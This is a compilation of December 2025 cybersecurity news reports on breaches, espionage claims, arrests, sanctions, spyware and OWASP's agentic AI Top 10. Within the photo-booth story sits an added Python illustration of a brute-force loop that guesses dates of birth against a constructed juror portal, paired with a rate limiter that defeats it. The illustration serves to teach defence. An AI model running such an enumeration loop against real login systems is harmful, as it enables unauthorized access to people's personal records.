Now, 404 Media reports in an explosive scoop that Doublespeed has been hacked. This wasn’t just one account associated with the startup, but the entire backend used to manage its phone farm — so it provides an extraordinary glimpse at how the service is actually being used to manipulate social media at scale.
Speaking to 404 on condition of anonymity, the hacker said they can “see the phones in use, which manager [computers controlling the phones] they had, which TikTok accounts they were assigned, proxies in use (and their passwords), and pending tasks. As well as the link to control devices for each manager.”
The hacker also shared a list of over 400 TikTok accounts operated by Doublespeed’s phone farm, about half of which were actively promoting products. Most of them, the publication reports, did so without disclosing that the posts were ads — a direct violation of TikTok’s terms of use, not to mention the Federal Trade Commission’s digital advertising regulations.
While undisclosed ads might seem like small potatoes in the grand scheme of things, they speak to a bleak trend. Not only is Doublespeed a possible breeding ground for disinformation campaigns or financial scams, but it seems to be getting away with its phone farm operation without any pushback from TikTok.
Doublespeed’s TikTok accounts ran a gamut of different cons, promoting language learning apps, supplements, massage products, dating apps and more. One account, operating under the unambiguously human-sounding name of Chloe Davis, had uploaded some 200 posts featuring an AI-generated woman hawking a massage roller for a company called Vibit, 404 reported.
Though the hacker says he reported the vulnerability to Doublespeed on October 31, he notes that he still had access to the company’s back end as recently as today.
So far, Doublespeed is only active on TikTok, though it has plans to expand to Instagram, Reddit, and X-formerly-Twitter. When it does, it seems all bets are off — with social media engagement, and all the influence it entails, being relegated to the highest bidder.
The Chinese Ministry of State Security intelligence service disclosed in October that the U.S. National Security Agency has been engaged in a three-year cyber campaign to break into the official National Time Service Center.
The center is located in the north-central city of Xian. It provides precision time services that state media say are vital for military systems, communications, finance, electricity, transportation and mapping.
The NSA had no comment on the report, but defense analysts say the Chinese report is a significant clue to one of the most secret programs in support of an advanced form of strategic missile defense called “left of launch.”
Left of launch refers to the window before a missile is fired, and to the military tools that can be used in that window once a missile is detected being readied for firing: cyberattacks that could cause missiles to blow up in their silos when the launch command is given, special operations commandos, and on-the-ground sabotage.
The project to conduct prelaunch attacks and sabotage of missile systems has been underway for at least a decade, and its elements are among the U.S. military’s most closely guarded secrets.
Asked recently how left of launch will be used in President Trump’s forthcoming Golden Dome defense system to prevent a missile from being fired, Space Force Gen. Michael A. Guetlein, vice chief of space operations, said cryptically: “Can’t talk about it.”
PNT satellite system
Gaining access to China’s central time system would provide a major advantage to the U.S. military and military intelligence services during a conflict by allowing hackers to disrupt missile strikes before launch or shortly after launch, known as the boost phase.
The time center is a key element of China’s BeiDou satellite navigation system, a copy of the U.S. GPS, which uses more than 35 satellites to provide the People’s Liberation Army with vital PNT — positioning, navigation and timing — for its missile systems.
The satellite system is said to provide “centimeter-level” precision and is linked to the National Time Service Center.
Theoretically, NSA cyber sleuths, by breaching the time center, could have planted malicious software inside the PNT data chain that could then be used for intelligence gathering on missile targets and providing false navigation parameters for missile strikes.
U.S. advanced artificial intelligence technology also could fashion prelaunch disruptions that could retarget Chinese missiles against Beijing.
A Chinese state media report on the NSA cyberattacks stated that control over timing is equivalent to “controlling the heartbeat of modern society.”
“Once the timing system is interfered with or hijacked, the consequences are unimaginable,” the online Chinese communications outlet C114 reported. It noted potential disruptions of financial markets, power grids, rail lines and military systems.
For missile systems, PNT is an essential element for real-time location, direction and precise time data used for accurate targeting, trajectory control and command and control.
“There’s no doubt that the best time to defeat a missile is before it’s launched,” said Todd Harrison, a defense expert with the American Enterprise Institute. “The most obvious way is to track and destroy the launchers and the command and control infrastructure and sensors that enable them.”
Conducting the attacks is difficult because of the distances involved and the risks of escalation.
Various non-kinetic tools can be used to defeat a missile “kill chain” before launch, including jamming sensors and communications, and cyberattacks on command and control systems, Mr. Harrison said.
Electronic disruptions before launch can produce uncertain effectiveness during combat, even if they initially produce impacts, because thinking adversaries will adapt and overcome the disruptions.
“The question for Golden Dome is how much relative effort the architecture puts toward left of launch versus other phases of flight,” Mr. Harrison said. “Left of launch will surely be part of the approach, but we still don’t know how much emphasis it will garner.”
Sensors and capabilities
Mr. Trump’s executive order on missile defense, signed in January, specifically calls for developing and deploying left-of-launch capabilities for Golden Dome.
The order states that in addition to deploying defenses targeting missiles in midflight and terminal phases, the new system must “defeat missile attacks prior to launch and in the boost phase.”
Gen. Stephen Whiting, commander of U.S. Space Command, said in September that left-of-launch defenses will provide a next-generation missile defense capability.
Prelaunch defenses are needed because enemy missiles are becoming more precise and more lethal, he said at a defense conference.
“We are seeing both the capacity and the capability of the threat missiles we’re now facing rapidly increase,” Gen. Whiting said at the annual Air, Space & Cyber Conference. “Just look over the last 18 months in the Israel-Iran conflict … multiple salvos of missiles, not single-digit missiles, not double-digit missiles. We’re talking triple-digit missile salvos paired with one-way attack drones.”
Gen. Whiting said current missile defenses are capable of providing warning and tracking of traditional ballistic missiles, but newer high-speed hypersonic maneuvering missiles and space-based hypersonic missiles are “incredibly destabilizing.”
“Our missile defenses have done broadly a good job during the most recent conflicts, but most of those are focused on terminal engagement,” the general said.
“We want to be able to push that engagement to the left, and eventually left of launch,” he said.
To conduct such prelaunch strikes, greater sensor integration is needed, and more sophisticated cyberattacks will be used to “drive capabilities that allow us to affect targets before they even begin to launch,” Gen. Whiting said.
Robert Peters, senior research fellow for strategic deterrence at The Heritage Foundation, said one of the more promising elements of the Golden Dome will be deploying better overhead sensors and coupling them with theater defense sensors. The advanced sensors will enhance homeland missile defenses by providing significantly greater awareness of when enemy missiles are being readied for launch, and then provide more accurate data once a missile is fired.
“This better integration of data and sensors greatly increases a state’s ability to intercept missiles before they hit their targets,” Mr. Peters said.
Launch preparations for solid-fuel missiles in silos, such as China’s new fields of more than 350 intercontinental ballistic missiles in western China, will be more difficult to detect before launch.
Mobile ICBMs moved out of garrison in preparation for launch have signatures that can be tracked more easily as part of left-of-launch defenses, Mr. Peters said.
“Golden Dome, if done properly, will invest heavily in these types of sensor architectures, not simply on more and more modern interceptors, as critical as those are,” Mr. Peters said.
Israel’s military conducted a series of left-of-launch strikes on Iranian missiles before the joint U.S.-Israeli bombing raid on Iran’s key nuclear facilities.
The Israel Defense Forces released videos of airstrikes on several Iranian mobile missiles that were blown up before they could be fired in retaliatory attacks.
Israeli forces also conducted sabotage operations inside Iran. They neutralized some key missile technicians in the days before the June raid on three nuclear facilities, according to an Israeli think tank report.
In addition to better sensors and increased cyberattack capabilities, special operations forces also will be developed for prelaunch strikes on targets.
Left-of-launch options
Lt. Gen. Sean Farrell, deputy commander of U.S. Special Operations Command, said special operations commandos are working on left-of-launch missile defense capabilities for missiles and drones.
“We have been working left of launch on behalf of the [Defense] Department to try to understand how we can get after the threats before they become a threat,” Gen. Farrell said at the conference with Gen. Whiting. “I think a lot of that will translate as well if we’re able to synchronize and plan together at the strategic level on where we can bring left-of-launch attention to a layered approach to homeland defense.”
The ultimate goal of the layered and integrated missile defense is to deploy an array of forces across all military domains that can detect, disrupt and potentially stop missile threats before they emerge.
Left-of-launch capabilities have been a topic within the Pentagon since at least 2014, when a memorandum was disclosed from Chief of Naval Operations Adm. Jonathan Greenert and Army Chief of Staff Gen. Ray Odierno to the secretary of defense warning that missile defense spending was “unsustainable” because of sharp defense cuts.
The two military leaders called for building more cost-effective left-of-launch capabilities.
Defense officials at the time said the research for left of launch included non-kinetic weapons, such as cyberattacks and electronic warfare, including electromagnetic pulse attacks against missile command and control systems.
These weapons would be used after missile launch preparations are detected. They would disrupt or disable launch controls or send malicious commands to cause the missiles to explode on their launchers.
In 2016, Adm. William Gortney, then commander of U.S. Northern Command, stated in prepared congressional testimony that most missile defenses are designed to intercept missiles after launch, using ground-based interceptors, mobile regional defenses and ship-based anti-missile systems.
“We need to augment our defensive posture with one that is designed to defeat ballistic missile threats in the boost phase as well as before they are launched, known as ‘left of launch,’” Adm. Gortney said.
Other potential boost-phase defenses could include high-powered lasers deployed on drones or aircraft that can strike missiles just after launch.
All current missile defense systems use kinetic kill interceptors that require precision targeting data to knock out high-speed warheads. They include Patriot; Terminal High Altitude Area Defense, or THAAD; the large Ground-Based Interceptors in Alaska and California; and the Aegis system, based mostly on ships and at several ground sites.
The Golden Dome will deploy space-based interceptors for the first time, providing greater coverage against missile threats.
Kenneth Todorov, former deputy director of the Missile Defense Agency and now vice president at Northrop Grumman Missile Defense Solutions, said the company is working on left-of-launch capabilities and counter-hypersonic missile efforts.
“With decades of experience supporting mission-critical defense programs across the entire kill chain, the company is bringing to bear a portfolio of advanced, innovative capabilities from left of launch, through detection and tracking, all the way to assessment of kill, delivering mission agility in addressing the evolving hypersonic threat,” Mr. Todorov said on the Northrop website.
Patrycja Bazylczyk, associate director of the Missile Defense Project at the Center for Strategic and International Studies, said left-of-launch defenses include a broad category of kinetic and non-kinetic efforts to counter enemy launches. They can include strikes on missile launchers, jamming enemy communications or infiltrating a missile factory.
“Left-of-launch efforts are not alternatives to active missile defenses; they work in tandem, allowing U.S. forces to more effectively counter enemy action rather than merely respond to it,” Ms. Bazylczyk said.
bleepingcomputer.com
By Bill Toulas
December 19, 2025
The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.
The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.
The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.
The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.
The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.
It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.
BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.
“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.
“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”
One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.
Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals for cryptocurrency, and he hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.
The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.
Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.
Regarding the other two arrested individuals, the police stated they have no evidence linking them to the Raccoon0365 operation or creation.
The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.
techcrunch.com
Lorenzo Franceschi-Bicchierai
12:15 PM PST · December 19, 2025
On Wednesday, Cisco revealed that a group of Chinese government-backed hackers is exploiting a vulnerability to target its enterprise customers who use some of the company’s most popular products.
Cisco has not said how many of its customers have already been hacked, or may be running vulnerable systems. Now, security researchers say there are hundreds of Cisco customers who could potentially be hacked.
Piotr Kijewski, the chief executive of the nonprofit Shadowserver Foundation that scans and monitors the internet for hacking campaigns, told TechCrunch that the scale of exposure “seems more in the hundreds rather than thousands or tens of thousands.”
Kijewski said the foundation was not seeing widespread activity, presumably because “current attacks are targeted.”
Shadowserver has a page where it is tracking the number of systems that are exposed and vulnerable to the flaw disclosed by Cisco, tracked as CVE-2025-20393. The vulnerability is known as a zero-day because it was being exploited before Cisco had a patch available. As of press time, India, Thailand, and the United States collectively have dozens of affected systems within their borders.
Censys, a cybersecurity firm that monitors hacking activities across the internet, is also seeing a limited number of affected Cisco customers. According to a blog post, Censys has observed 220 internet-exposed Cisco email gateways, one of the products known to be vulnerable.
In its security advisory published earlier this week, Cisco said that the vulnerability is present in software found in several products, including its Secure Email Gateway and its Secure Email and Web Manager.
Cisco said these systems are only vulnerable if they are reachable from the internet and have the “spam quarantine” feature enabled. Neither condition is enabled by default, per Cisco, which would explain why relatively few vulnerable systems appear on the internet.
Cisco did not respond to a request for comment, asking if the company could corroborate the numbers seen by Shadowserver and Censys.
The bigger problem with this hacking campaign is that there are no patches available. Cisco recommends that customers wipe and “restore an affected appliance to a secure state,” as a way to remediate any breach.
“In case of confirmed compromise, rebuilding the appliances is, currently, the only viable option to eradicate the threat actors persistence mechanism from the appliance,” the company wrote in its advisory.
According to Cisco’s threat intelligence arm Talos, the hacking campaign has been ongoing since “at least late November 2025.”
bbc.com
Sam Francis
Political reporter
19.12.2025
The trade minister says information was accessed and an investigation has been launched.
Government data has been stolen in a hack though officials believe the risk to individuals is "low", a minister has said.
Trade Minister Chris Bryant told BBC Breakfast "an investigation is ongoing" into the hack, adding that the security gap was "closed pretty quickly".
A Chinese affiliated group is suspected of being behind the attack, but Bryant said investigators "simply don't know as yet" who is responsible.
That data is understood to have been on systems operated on the Home Office's behalf by the Foreign Office, whose staff detected the incident.
"We think that it's a fairly low-risk that individuals will have been compromised or affected," Bryant said.
It comes after the Sun newspaper reported that hackers affiliated to the Chinese state accessed the data in October with information possibly including visa details targeted.
The incident has been referred to the Information Commissioner's Office.
UK intelligence agencies have warned about increasing, large-scale espionage from China, using cyber and other means, and targeting commercial and political information.
The cyber-agency GCHQ said last year that it was devoting more resources to counter threats from China than any other nation.
"Government facilities are always going to be potentially targeted," Bryant said on Friday.
"We are working through the consequences of what this is."
"This is a part of modern life that we have to tackle and deal with," Bryant added, pointing to major hacks in recent years at Jaguar Land Rover, Marks & Spencer and the British Library.
Confirmation of a hack by a Chinese state group would be awkward for the government ahead of a planned visit to Beijing next year by Sir Keir Starmer, the first by a UK prime minister since 2018.
The Labour government has said it is important to engage with China as it cannot be ignored on trade, climate change and other major issues, but face-to-face meetings also provide a forum for robust exchanges about issues affecting UK security.
The Chinese government has consistently denied it backs cyber-attacks targeting the UK.
Last year, responding to the UK government's National Security Strategy, a spokesperson for the Chinese embassy in London said "accusations such as Chinese espionage, cyber-attacks, and transnational repression against the UK are entirely fabricated, malicious slander".
Earlier this month, Sir Keir said UK government policy towards China could not continue to blow "hot and cold".
Failing to navigate a relationship with China, he said, would be a "dereliction of duty" when China is a "defining force in technology, trade and global governance".
Building a careful relationship would instead bolster the UK's place as a leader on the international stage and help secure UK national interests, Sir Keir said, while still recognising the "reality" that China "poses national security threats".
Commsrisk
By Eric Priezkalns
15 Dec 2025
Serbia’s Ministry of Internal Affairs has issued a statement and photographs relating to the arrest of two Chinese nationals who sent smishing SMS messages from a fake base station. The messages included links to websites which impersonated reputable public and private sector organizations including mobile operators. The websites asked for the details of the payment cards belonging to victims. The information obtained from victims was then used to purchase goods and services abroad.
This appears to be the first reported case of its type in Serbia. Nothing was said about the location in Serbia where the men were caught but the police reportedly searched multiple apartments and business premises. The two arrested men, aged 33 and 34, were said to be working for an organized criminal gang that operates across ‘several’ European countries.
Regular readers of Commsrisk may also notice a telltale sign that these criminals are connected to SMS blasting smishers found elsewhere. Photographs of the equipment found in their car show they possessed a distinctive orange DC-AC power converter of a type also used in conjunction with SMS blasters seized in many other countries. Scroll down for the photographs of the equipment found in Serbia.
Commsrisk uses AI-powered search to maintain the most comprehensive global map of reported SMS blasters. This incident has been added to the map.
Photographs of the seized equipment released by the Serbian government accompany the original article, as do a video of the two men being arrested and the announcement posted on the official Instagram account of the Serbian Ministry of Internal Affairs.
therecord.media
Forensic researchers at Reporters Without Borders (RSF) have found a previously unknown spyware tool on a Belarusian journalist’s phone, the nonprofit said Wednesday.
The organization said it believes the spyware has been in use since at least 2021 based on its analysis comparing samples on an antivirus platform. Dubbed ResidentBat, the spyware can access call logs, SMS and encrypted app messages, microphone recordings, locally stored files and screen captures. It is used to target Android phones.
The journalist and RSF believe the spyware was installed while the journalist was detained by the Belarusian KGB. The phone was seized during questioning and authorities at one point forced the journalist to unlock the phone, RSF said in a press release.
Similar examples of authoritarian regimes installing spyware on journalists' phones while they are being questioned by police or security services have occurred recently in Serbia and Kenya.
“Growing list of cases where authoritarian regimes use detention to implant spyware on phones,” John Scott-Railton, a digital forensic researcher at Citizen Lab, said in a social media post. “Important investigation and reminder that dictators don't always need zero-days.”
In December 2024, Citizen Lab reported it had found spyware secretly placed on a phone belonging to a Russian programmer accused of supporting Ukraine after he was released from custody by Russian authorities.
The recent infection targeting the Belarusian journalist came to light after antivirus software on their phone flagged “suspicious components” a few days after their detention. The journalist contacted the Eastern European nonprofit RESIDENT.NGO, which analyzed the phone with RSF.
“By deploying surveillance technologies such as ResidentBat, the Belarusian state is pursuing a deliberate strategy of repression against independent journalism,” Antoine Bernard, RSF’s director of advocacy and assistance, said in a statement. “The systematic invasion of their private and professional lives amounts to a direct and unlawful assault on press freedom and fundamental rights.”
Belarus ranks 166th out of 180 countries and territories on a press freedom survey conducted by the organization.
RSF said it has made Google aware of its findings, and the tech giant plans to send a threat notification to all Google users identified as targets of the spyware campaign.
TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
7:37 AM PST · December 12, 2025
Hama Film makes photo booths that upload pictures and videos online. But their back-end systems have a simple flaw that allows anyone to download customer pictures.
A company that makes photo booths is exposing pictures and videos of its customers online thanks to a simple flaw in its website where the files are stored, according to a security researcher.
The researcher, who goes by Zeacer, alerted TechCrunch to the security issue in late November after reporting the vulnerability in October to Hama Film, the photo booth maker that has franchise presence in Australia, the United Arab Emirates, and the United States, but did not hear back.
Zeacer shared with TechCrunch a sample of pictures taken from Hama Film’s servers, which showed groups of clearly young people posing in photo booths. Hama Film’s booths not only print out the photos like a typical photo booth, but booths also upload the customers’ photos to the company’s servers.
Vibecast, which owns Hama Film, has yet to respond to his messages alerting the company of the issues. Vibecast also hasn’t responded to several requests for comment from TechCrunch, nor did Vibecast’s co-founder Joel Park respond to a message we sent via LinkedIn.
As of Friday, the researcher said the company has still not fully resolved the security flaw and continues to expose customers’ data. As such, TechCrunch is withholding specific details of the vulnerability from publication.
When Zeacer first found this flaw, he noted that it appeared that photos were deleted from the photo booth maker’s servers every two to three weeks.
Now, he said, the pictures stored on the servers appear to get deleted after 24 hours, which limits the number of pictures exposed at any given time. But a hacker could still exploit the vulnerability he discovered each day and download the contents of every photo and video on the server.
Before this week, Zeacer said at one point he saw more than 1,000 pictures online for the Hama Film booths in Melbourne.
This incident is the latest example of a company that, at least for a time, was not implementing certain basic and widely accepted security practices, such as rate-limiting. Last month, TechCrunch reported that government contractor giant Tyler Technologies was not rate-limiting its websites used for allowing courts to manage their jurors’ personal information. This meant anyone could break into any juror’s profile by running a computer script capable of mass-guessing their date of birth and their easy-to-guess numerical identifier.
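The mass-guessing pattern described above (a short numeric identifier plus a date of birth, checked by an endpoint that never slows down) and the per-target throttle that defeats it, as an added Python illustration. This is not code from TechCrunch, Hama Film or Tyler Technologies; the "juror portal", its records, its attempt limits and the birth-year window are constructed stand-ins, and the limiter is keyed on the target identifier rather than the caller's IP address so that rotating source addresses does not reset it.

```python
"""Why a missing rate limit turns a small, guessable credential space into a
routine enumeration attack, and what a per-target attempt limiter does about
it. Added illustration; not code from TechCrunch, Hama Film or Tyler
Technologies. The 'juror portal', its records and its limits are constructed."""
import hmac
import time
from collections import defaultdict, deque
from datetime import date, timedelta

# Constructed records: a short numeric identifier and a date of birth are the
# whole "secret" the portal checks, which is the weakness the article describes.
RECORDS = {
    "1001": date(1980, 5, 17),
    "1002": date(1975, 11, 3),
}


def guess_space(id_digits: int, dob_years: int) -> int:
    """Upper bound on (identifier, date of birth) pairs an attacker must try:
    every identifier of that many digits times every day in the birth window."""
    return (10 ** id_digits) * (dob_years * 366)


class Portal:
    """Stand-in login check. With max_attempts=None it behaves like the
    unthrottled endpoint in the article; otherwise it enforces a sliding-window
    limit keyed by the *target* identifier, so rotating source IP addresses
    does not reset it."""

    def __init__(self, max_attempts=None, window_seconds=900, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.clock = clock                    # injectable so behaviour is testable
        self.attempts = defaultdict(deque)    # juror_id -> attempt timestamps

    def _throttled(self, juror_id: str) -> bool:
        if self.max_attempts is None:
            return False
        now = self.clock()
        q = self.attempts[juror_id]
        while q and now - q[0] > self.window:   # drop attempts outside the window
            q.popleft()
        if len(q) >= self.max_attempts:
            return True
        q.append(now)
        return False

    def login(self, juror_id: str, dob: date) -> str:
        """Returns 'ok', 'denied' or 'throttled'. Throttling is checked before
        the lookup, so a limited caller learns nothing about the record."""
        if self._throttled(juror_id):
            return "throttled"
        expected = RECORDS.get(juror_id)
        # constant-time comparison of equal-length ISO strings avoids a timing leak
        ok = expected is not None and hmac.compare_digest(
            expected.isoformat().encode(), dob.isoformat().encode())
        return "ok" if ok else "denied"


def brute_force(portal: Portal, juror_id: str,
                start=date(1970, 1, 1), end=date(1990, 12, 31)):
    """Attacker loop: try every date of birth in the window for one identifier.
    Returns (matching dob or None, attempts made, attempts that were throttled)."""
    d, tries, throttled = start, 0, 0
    while d <= end:
        tries += 1
        result = portal.login(juror_id, d)
        if result == "ok":
            return d, tries, throttled
        if result == "throttled":
            throttled += 1
        d += timedelta(days=1)
    return None, tries, throttled


if __name__ == "__main__":
    print("search space for 4-digit id x 20 birth years:", guess_space(4, 20))
    print("unthrottled:", brute_force(Portal(), "1001"))
    print("5 attempts per 15 min:", brute_force(Portal(max_attempts=5), "1001"))
```

Against the unthrottled portal the loop recovers the record after a few thousand requests, which is seconds of work; with a limit of five attempts per fifteen minutes per identifier the same loop is throttled from the sixth request onward and never reaches the matching date. A production deployment would add the same accounting per source address and per session, and would alert on identifiers that hit the limit repeatedly.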
News provided by
OWASP
Dec 10, 2025, 03:03 ET
WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects a culmination of input from over 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of resources designed for practitioners providing data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, European Commission and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation, and Identity and Privilege Abuse are some of the highlighted threats within the Top 10, and they showcase how attackers can subvert agent capabilities or their supporting infrastructure. Incidents involving these increasingly capable agentic systems are emerging across industries, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainose. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
The Top 10 for Agentic Applications joins a growing portfolio of peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture The Flag application, designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems."
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.
From:
Foreign, Commonwealth & Development Office gov.uk
Published
9 December 2025
Two tech companies based in China have been sanctioned for reckless and indiscriminate cyberattacks
Sichuan Anxun Information Technology Co. Ltd (known as i-Soon) for targeting over 80 government and private industry IT systems across the world, and for supporting others planning to carry out malicious cyber activity.
Integrity Technology Group Incorporated (known as Integrity Tech) for controlling and managing a covert cyber network and providing technical assistance for others to carry out cyberattacks. Targets have included UK public sector IT systems.
I-Soon and Integrity Tech are examples of the threat posed by the cyber industry in China, which includes information security companies, data brokers (that collect and sell personal data), and ‘hackers for hire’. Some of these companies provide cyber services to the Chinese intelligence services.
The UK's National Cyber Security Centre (NCSC) assesses that it is almost certain that this 'ecosystem', a complex network of private sector actors, supports Chinese state-linked cyber operations.
The announcement follows the August 2025 exposure by the UK and international partners of three China-based companies linked to the cyber-espionage campaign known as SALT TYPHOON. Combined, they highlight the vast scale of cyberattacks by China-based companies targeting governments, telecommunications, military institutions, and public services worldwide.
These cyberattacks from unrestrained actors in China go against agreed UN cyber principles. The measures announced today are designed to reduce the risk of such threats to the UK’s security and broader international stability.
As the Prime Minister set out recently in a speech at the Guildhall, protecting our security is non-negotiable and the first duty of the government. The UK recognises that China poses a series of threats to UK national security. China is also a fellow permanent member of the UN Security Council, the world’s second largest economy and a nuclear power which has delivered almost a third of global economic growth over the past decade. We challenge threats robustly, enabling us to pursue cooperation where it is in our interest.
Notes to Editors
In August 2025, the UK alongside 12 other countries co-sealed a cyber security advisory linking China-based technology companies to some of the activities associated with a China state-affiliated APT group (commonly known as SALT TYPHOON). These companies are: Sichuan Juxinhe Network Technology Co. Ltd, Beijing Huanyu Tianqiong Information Technology Co., and Sichuan Zhixin Ruije Network Technology Co. Ltd.
This activity targeted governments, telecommunications, transportation, and military infrastructure globally, and sought to provide Chinese intelligence services with the capability to identify and track targets’ communications and movements worldwide.
Together with France, the UK continues to lead the Pall Mall Process, an international initiative which seeks to establish a framework for responsible behaviour for those involved in the rapidly growing market in commercial cyber intrusion capabilities.
The UK has consistently promoted the UN normative framework for responsible state behaviour in cyberspace. The UK remains the first and only country to publish guidelines for its National Cyber Force detailing the principles that we adhere to. We firmly believe that states should use cyber capabilities in a responsible manner, whether commercial or otherwise.
breakingnews.ie
Darragh Mc Donagh
It has now emerged that a second ransomware attack took place last February
There is no evidence that patients’ data was stolen during a second ransomware attack targeting Health Service Executive (HSE) systems earlier this year, the authority has said.
Earlier this week, the HSE began offering compensation to victims of a cyberattack that caused widespread disruption in May 2021, costing the agency an estimated €102 million.
It has now emerged that a second ransomware attack took place last February, targeting a third-party processor and resulting in a data protection breach reported by HSE primary care services in the midlands.
IT systems were fully recovered following the cyberattack and there was no evidence that data had been exfiltrated, according to HSE records obtained under the Freedom of Information Act.
A ransomware attack occurs when malicious software locks or encrypts a victim’s computer systems, blocking access until a ransom is paid. Some attacks involve a threat to leak stolen data.
A spokeswoman for the HSE did not respond when asked whether the health authority had paid a ransom following the February cyberattack.
“The HSE manages and responds to thousands of cyber threats annually, taking appropriate action to ensure awareness of current threats, while maintaining the ability to deliver healthcare services securely and reliably, regardless of the evolving threat landscape,” she said.
The spokeswoman said HSE systems were not “directly” impacted by the February ransomware attack.
“The HSE has invested significantly in cyber remediation since the cyberattack in May 2021. Multiple ongoing programmes of work are focused on addressing all issues highlighted in the wake of the attack,” she added.
The original ransomware attack occurred when an employee clicked on a malicious MS Excel file that was attached to a phishing email on March 18th, 2021.
This enabled the hackers to gain access to the HSE’s IT environment, where they continued to operate undetected for more than eight weeks before detonating the ransomware on May 14th.
The attack caused widespread disruption and some information relating to patients was illegally accessed and copied.
Last year, the HSE said it had written to 90,936 people affected by the cyberattack. It has reportedly offered compensation of €750 to more than 600 individuals who took legal action over the breach.
A subsequent investigation found that the HSE was operating a frail IT system and did not have adequate cyber expertise or resources prior to the attack. The attack is estimated to have cost the HSE €102 million.
ico.org.uk | The Information Commissioner’s Office (ICO)
Date 11 December 2025
The Information Commissioner’s Office (ICO) has fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million of its UK users.
Service which promises to help people improve their security, has failed them, leaving them vulnerable
Combination of two isolated incidents enabled hacker to steal personal information relating to 1.6m customers
‘Zero knowledge’ encryption system ensures customer passwords and vaults are not decrypted
We have fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million of its UK users.
We found that LastPass failed to implement sufficiently robust technical and security measures, which ultimately enabled a hacker to gain unauthorised access to its backup database. There is no evidence that the hacker was able to decrypt customer passwords, as the master passwords needed to decrypt them are stored locally on customers' devices and not by LastPass.
